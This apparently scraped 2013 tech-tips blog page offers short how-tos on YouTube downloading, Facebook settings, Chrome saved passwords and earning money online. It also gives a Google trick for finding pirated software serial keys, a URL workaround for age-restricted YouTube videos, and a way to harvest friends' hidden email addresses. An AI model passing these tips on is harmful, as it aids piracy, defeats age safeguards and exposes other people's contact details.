7) Click OK until you are done.

Saturday 20 July 2013

how to download video from YouTube


1. First Go to Youtube Homepage.
2. Then select the video you want
to download. I will demonstrate
with video url given below.
http://www.youtube.com/
watch?v=_JAa3NvP6f4
Now add save or ss
or kick before
youtube and press
enter.
3. After adding any of the above
keyword the above link will
become.
http://www. save youtube.com/
watch?v=_JAa3NvP6f4
Or
http://www. ssyoutube.com/
watch?v=_JAa3NvP6f4
Or
http://www. kick youtube.com/
watch?v=_JAa3NvP6f4
4. Now you will be redirected to a
new page from where you can
download youtube videos in any
format of your choice. You may also
download only the soundtrack of
the video in mp3 format.

how to watch 18+ video on YouTube without login


1. First get the Url of video you
want to watch. As shown below.
http://www.youtube.com/
watch?v= 4Xkh6j7RMqk
2. Then copy the Video Id. For
above link video Id is
4Xkh6j7RMqk
3. Now paste the Video Id in the
link given below.
http://www.youtube.com/v/
VideoId?fs=1
Replace VideoId
with the Id you
copied in Step 2
4. Now the url will become as
shown below.
http://www.youtube.com/
v/ 4Xkh6j7RMqk ?fs=1
5. Done.

how to find serial key of any software using Google


Follow simple
steps given below to learn this
trick
1. Go to Google
2. Then type Software Name
94FBR
Replace Software
Name with the
name of software
whose serial key
you want to find
Eg: To find serial
key of Nero i will
type Nero 94fbr
3. Now press Enter and you will
find serial key of software

how to block Facebook on my computer


. First download Facebook Blocker
by Clicking Here
2. Extract the file and right click
on Facebook Blocker.exe and run it
as administator (Important)
3. Press 1 in order to backup
your host file to be on the safe
side.
  4. Now Press 2 to block facebook
5. Its time to check if facebook is
blocked or not to do that Press 5
6. Hope this help you if you have
any question leave a comment
below.

how to block ads on YouTube

How To Block Youtube Ads ? Most of you get bored or annoyed due ads playing before youtube videos. Today i will share with you an amazing peace of programme called Block YouTube Ads . It removes all video ads before and during videos, as well as removes all those ads that pop at the bottom of the screen while the video is playing. It works on all major browser such Internet explorer, google chrome and mozilla firefox. 1. Download Youtube Ads Blocker 2. Double click on downloaded file. 3. Follow the on screen instruction.

how to view saved password in Google chrome

1. Open Google Chrome 2. Go to Settings (Its on the Right Corner) 3. Then Click on Advance Settings 4. Scroll Down and their will be password and forms from their click on Manage saved password. 5. Then list of all websites whose passwords are saved on browser will be listed. 6. Click on show to view those passwords 7. Enjoy!!

create a unique profile picture

Create a unique Facebook profile picture At the top of your Facebook profile, you'll see the five most recent pictures containing a picture of you. You can use this section of your profile to make a more unique and original profile picture by extending the main profile picture into these recent pictures. As can be seen in the picture to the right, this profile takes a larger image and spreads it from the profile picture into the recent pictures across the top. This can be accomplished using the free Pic Scatter online tool. With this tool, you can upload any picture and adjust the picture to be shown in the profile section, the top five images, and even the wall. Notice When using this technique any time you or a friend tags you in a photo it will be posted in the top section of your profile ruining this effect. To keep this effect, hide any new photo by clicking the x that appears when hovering the mouse in the top right- corner of the picture.

how to use internet to make money

Self publish books . If you love writing and want to get a book published, Amazon offers a free service called Kindle Direct Publishing. The service allows anyone to self publish books on the Kindle (electronic) bookstore and earn royalties from sales. There are two plans you can choose from — the 35% royalty works across any book sold in any country) while the 70% royalty plans works if you sell in a few select countries. Indian authors can choose to set prices specifically for the Indian bookstore and receive royalty payments in Indian currency as well. Make & sell your apps . With so many smartphones and tablets, app development can be a very lucrative business. You can learn about developing apps online — there are various tutorials available for free. That's the easy part — the hard part is coming up with an idea that 'clicks'. Once you make an app, submit it to the respective app store, set a price and choose whether you want to earn from inapp advertising. Your earnings, after deducting the appropriate fees, will be paid monthly. Sell your photos Online . Numerous stock websites like www.shutterstock. com, www.shutterpoint.com and www. istockphoto.com host photographs submitted by members. Depending on the site's policy, you can earn between a 15 to 85% royalty on each sale. The better the quality of photos and the larger your online portfolio, the more you will sell. Usually, each photograph you want to upload will have to be 'selected' by them first — and they usually have strict requirements of what can or cannot go on sale. Sell old stuff online . An easy way to earn some money on the Internet is by selling old stuff that you have around the house. Websites like www.olx.in, www.quickr.com & http:// craigslist.co.in provide a free classifieds platform. You need to create an account, enter the product details, location, the expected price along with some photographs — listing usually go live within a couple of hours. Interested buyers can directly contact you and finalise the sale. Start an online shop . With some creativity, you can learn to make handicrafts or if you know a wholesale dealer, purchase unique things at low prices. Once you have some stock ready, you can set up an online shop to sell these goods on sites like www.ebay.in or www.indiebazaar.com. Both sites have a simple signup process. After you get verified as a seller, they provide you with a step- by-step wizard to set your online store (how to add photos & details of items you want to sell). Work online for money . The internet is full of bogus companies that promise to pay you for work but never will. For instance, all places that offer money to fill surveys or those that require payment up front are scammers. Two popular & reliable places to find work are www. odesk.com and www.elance.com. Both have a similar system: set up a profile and take tests to prove your proficiency in certain areas. Once done, you'll be listed as a contractor/freelancer and people can hire you for an hourly rate. You can get paid more by working hard, getting better at what you do and getting good feedback (ratings) from your clients. E-Tutoring If you are fluent in any subject and have some tutoring experience, you can sign up on websites like www.2tion.net or www.tutorvista.com as an online tutor. The sites require you to create a tutor profile with details such as the subjects in which you are fluent, what classes/courses you want to teach, your experience level, preferred timings for tutions and the remuneration expected. After verification, the site lists your profile on their portal where interested students can connect with you for tuitions. You can opt for virtual workspaces with built in teaching aids like live chat and collaborative whiteboards. Once you get better at tutoring, you can increase your monthly earnings by teaching multiple students simultaneously. Earn from Advertising A reliable way to earn money is from Google AdSense on your blog/ website or ads on your YouTube channel. To get started, create a Google AdSense account at www. google.com/adsense. You ca

fb keyboard shortcut


M Open a new message *
? Go to the Facebook Search
1 Home (News Feed)
2 Your profile page
3 Friend requests
4 Messages
5 Notifications
6 Your Account Settings
7 Your Privacy Settings
8 Go to the Facebook page
9 View Facebook Statements and
Rights agreement
0 Open Facebook help center
Notice: The above shortcut keys
only work with the numbers on the
top of your keyboard, not the
number pad.

how to safe your Facebook profile


How to use ‘Trusted
Contacts’ feature on
Facebook
1. While logged into facebook
account, click on Gear icon at
top right and then click on
Account Settings option. On
the Settings screen, click on
the security tab.
2. You should see “Trusted
Contact: You don’t have any
trusted contacts yet ” option.
Click Edit button next to this
option and then click Choose
Trusted Contacts option.
3. Then you can select 3-5
trusted friends whose help can
be used for recovering your
Facebook account access in
future. You can change and
add new trusted friends
anytime. Every new friends
added as trusted friend is
notified about the same.
However, any friend removed
from trusted friends list will

Thursday 18 July 2013

how to see hidden file and folder

how to see hidden file and hidden folder inTo display hidden files and folders 1. Open Folder Options in Control Panel. • Click Start , and then click Control Panel. • Click Appearance and Themes , and then click Folder Options. 2. On the View tab, under Hidden files and folders, click Show hidden files and folders. Note • Hidden files and folders will appear dimmed to indicate they are not typical items. Usually, hidden files are program or system files that should not be deleted or changed. To display other hidden files, clear the Hide protected operating system files (Recommended) check box. • If you know the name of a hidden file or folder, you can search for it. For more information, click Related Topics . • If you want to see all file name extensions, clear the Hide file extensions for known file types check box.To display hidden files and folders 1. Open Folder Options in Control Panel. • Click Start , and then click Control Panel. • Click Appearance and Themes , and then click Folder Options. 2. On the View tab, under Hidden files and folders, click Show hidden files and folders. Note • Hidden files and folders will appear dimmed to indicate they are not typical items. Usually, hidden files are program or system files that should not be deleted or changed. To display other hidden files, clear the Hide protected operating system files (Recommended) check box. • If you know the name of a hidden file or folder, you can search for it. For more information, click Related Topics . • If you want to see all file name extensions, clear the Hide file extensions for known file types check box.

find out hidden actual email address from Facebook


Find out Hidden Actual
Email Address from
Facebook Address
Facebook recently added a new
layer of security by hiding the
actual email address of its users
and by introducing @facebook.com
email address instead of
@gmail.com or @yahoo.com
addresses.
This security feature is a great
move to prevent email phishing
scams but on the other hand this
new security feature of facebook is
emerging as a problem for
frequent facebook users.
Some problems arise when we
need actual email address of our
friend for mailing purpose.
But in this article we are
introducing some tricks to convert
@facebook.com address to actual
email address. I hope tricksmode
readers will found it helpful.
Things required:
Access to yahoo.com
So here we start
Step 1: Go to yahoo.com
Step 2: sign in on http://
login.yahoo.com by using your
facebook account.
Step 3: After successful login. Click
on “ import contacts from
facebook” and you’re done. You
will get your entire facebook
friend’s actual email address
there.
you can search that list to get
your desired friend’s actual email
address.
What you think on this article?
Please leave your valuable
feedbacks in comment box below.

how to download video from YouTube


Getting the YouTube file to your
computer
Today, there are several online
websites that allow you to enter the
URL of the video you wish to save to
your computer, and get a link to
download the file. Below is a short
list of some of the more popular free
websites.
http://www.savevid.com/
http://keepvid.com/
Below is a brief description of how to
save a video using Savevid. These
steps are often very similar with
other services used to save YouTube
and other flash videos online.
1. Go to the YouTube video page and
copy the URL of the video you wish
to save. For example, below is a URL
to a video on YouTube.
http://www.youtube.com/watch?
v=R3ymHMgFAps
2. Once this address has been copied,
visit SaveVid and paste that URL into
the URL text field, then click the
Submit or Download button.
3. If done properly, the page should
open a new window or display a link
to each of the video formats that can
be saved. Savevid will give you the
option to save the video as FLV, 3GP,
MP4 and WebM format. If you're
wanting to watch this video on the
computer we recommend saving the